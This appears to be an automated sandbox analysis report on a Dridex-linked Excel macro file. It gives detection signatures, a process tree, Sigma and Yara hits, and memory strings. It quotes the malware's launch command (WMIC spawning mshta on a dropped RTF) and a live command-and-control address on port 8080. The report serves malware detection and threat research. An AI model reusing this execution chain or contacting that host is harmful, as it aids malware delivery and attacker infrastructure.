Loading ...

Play interactive tourEdit tour

Windows Analysis Report 56449657.xlsm

Overview

General Information

Sample Name:56449657.xlsm
Analysis ID:532311
MD5:3ff89734f2c6a54fe79464e94151ce10
SHA1:4b4f24fec70071de89a76b70e12394a56efdcf62
SHA256:9818931574ed09e96ddc907c47907cfc6fbfad3f6bc3fca1c0f3b210c1d458f4
Tags:Dridexxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Sigma detected: TA505 Dropper Load Pattern
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Launches processes in debugging mode, may be used to hinder debugging
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 4240 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 5880 cmdline: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 6044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • WmiPrvSE.exe (PID: 6000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • mshta.exe (PID: 1332 cmdline: mshta C:\ProgramData\vqcMnINBAOOJC.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\vqcMnINBAOOJC.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: TA505 Dropper Load PatternShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 6000, ProcessCommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, ProcessId: 1332
      Sigma detected: Suspicious MSHTA Process PatternsShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding, ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe, ParentProcessId: 6000, ProcessCommandLine: mshta C:\ProgramData\vqcMnINBAOOJC.rtf, ProcessId: 1332
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4240, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", ProcessId: 5880
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 4240, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf", ProcessId: 5880

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 56449657.xlsmReversingLabs: Detection: 13%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Source: global trafficTCP traffic: 192.168.2.4:49826 -> 157.230.250.107:8080
      Source: global trafficTCP traffic: 192.168.2.4:49826 -> 157.230.250.107:8080
      Source: global trafficTCP traffic: 192.168.2.4:49826 -> 157.230.250.107:8080
      Source: Joe Sandbox ViewIP Address: 157.230.250.107 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: unknownTCP traffic detected without corresponding DNS query: 157.230.250.107
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8
      Source: mshta.exe, 00000011.00000003.857700563.00000269D5596000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928374780.00000269D5596000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/
      Source: mshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/BAOOJC.rtfR
      Source: mshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmothR
      Source: mshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmother
      Source: mshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfu
      Source: mshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuci
      Source: mshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckUWT
      Source: mshta.exe, 00000011.00000002.928213340.00000269D5515000.00000004.00000020.sdmp, mshta.exe, 00000011.00000003.857806201.00000269D5515000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfucke
      Source: mshta.exe, 00000011.00000003.857823332.00000269D552F000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928232600.00000269D552F000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82saSM
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhh(e
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhof
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhor
      Source: mshta.exe, 00000011.00000003.857778956.00000269D54DB000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928170505.00000269D54DB000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf
      Source: mshta.exe, 00000011.00000003.857778956.00000269D54DB000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928170505.00000269D54DB000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9
      Source: mshta.exe, 00000011.00000003.857700563.00000269D5596000.00000004.00000001.sdmp, mshta.exe, 00000011.00000003.857778956.00000269D54DB000.00000004.00000001.sdmp, mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e%
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e&-
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9eM(
      Source: mshta.exe, 00000011.00000003.857778956.00000269D54DB000.00000004.00000001.sdmpString found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9eh
      Source: mshta.exe, 00000011.00000003.857834199.00000269D553C000.00000004.00000001.sdmp, mshta.exe, 00000011.00000002.928246833.00000269D553C000.00000004.00000020.sdmpString found in binary or memory: http://157.230.250.10e
      Source: EXCEL.EXE, 00000000.00000002.933601808.0000000013067000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: EXCEL.EXE, 00000000.00000002.932293689.000000000F7D0000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
      Source: EXCEL.EXE, 00000000.00000002.930150892.000000000DA06000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tablew
      Source: EXCEL.EXE, 00000000.00000003.786918474.0000000016269000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787015034.000000001606A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.784409991.0000000016069000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.781717569.00000000161F9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.781858345.00000000162B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
      Source: EXCEL.EXE, 00000000.00000003.787015034.000000001606A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.784409991.0000000016069000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
      Source: EXCEL.EXE, 00000000.00000003.786918474.0000000016269000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.781717569.00000000161F9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.781858345.00000000162B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
      Source: EXCEL.EXE, 00000000.00000003.782352963.000000001314F000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: http://weather.service.msn.com/data.aspx.0/iosY
      Source: EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlog
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadxD)
      Source: EXCEL.EXE, 00000000.00000003.787102445.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807889222.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662721741.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.933958853.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782581219.000000001325D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743536985.000000001325D000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryMQ6
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removec
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removey
      Source: EXCEL.EXE, 00000000.00000002.933761146.0000000013153000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782387248.0000000013153000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryLL4
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api1
      Source: EXCEL.EXE, 00000000.00000003.662903857.000000001329A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662753926.000000001329A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743595898.00000000132A2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743076931.000000001329A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659756705.00000000132AB000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiMruMaxLocalItemCount100EnableXL2PBIFullFidelityfalseEnableXL
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/apiT
      Source: EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.aadrm.com
      Source: EXCEL.EXE, 00000000.00000002.933997365.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782673322.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662745522.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.787123980.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743580229.000000001328A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.807929408.000000001328A000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.aadrm.com/
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.com6
      Source: EXCEL.EXE, 00000000.00000003.743103190.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.783535399.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.659767884.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.934053961.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662772379.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.662921296.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.782794397.00000000132C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.663064420.00000000132C8000.00000004.00000001.sdmp, 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: 7065FF96-0F32-40B3-B28E-F452FBC97932.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
